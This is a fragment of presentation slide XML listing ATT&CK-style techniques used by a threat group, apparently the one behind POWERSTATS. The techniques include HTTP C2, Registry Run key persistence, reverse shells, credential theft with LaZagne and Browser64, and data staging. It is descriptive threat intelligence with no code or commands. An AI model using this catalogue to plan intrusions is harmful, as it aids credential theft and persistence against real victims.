                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Application Layer Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId11">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Web Protocols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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has used HTTP for C2 communications.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId12">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Archive Collected Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId13">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Archive via Utility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId14">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Boot or Logon Autostart Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId15">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Registry Run Keys / Startup Folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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has added Registry Run key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to establish persistence.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId16">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Command and Scripting Interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId17">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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has used PowerShell for execution.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId16">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Command and Scripting Interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId18">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Windows Command Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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has used a custom tool for creating reverse shells.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId16">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Command and Scripting Interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId19">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Visual Basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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has used VBScript files to execute its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId20">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>POWERSTATS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> payload, as well as macros.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId16">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Command and Scripting Interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId21">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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has used developed tools in Python including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId22">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Out1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId16">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Command and Scripting Interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId23">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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has used JavaScript files to execute its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId20">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>POWERSTATS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> payload.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId24">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Credentials from Password Stores</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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has performed credential dumping with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId25">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>LaZagne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and other tools, including by dumping passwords saved in victim email.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId26">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Credentials from Web Browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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has run tools including Browser64 to steal passwords saved in victim web browsers.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId27">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Data Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId28">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Standard Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Average"/>
                <a:ea typeface="Average"/>
                <a:cs typeface="Average"/>
                <a:sym typeface="Average"/>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has used tools to encode C2 communications including Base64 encoding.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId29">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Data Staged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId30">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Local Data Staging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>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has stored a decoy PDF file within a victim's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>%temp%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1550" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> folder.</a:t>
            </a:r>
            <a:endParaRPr sz="1550" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
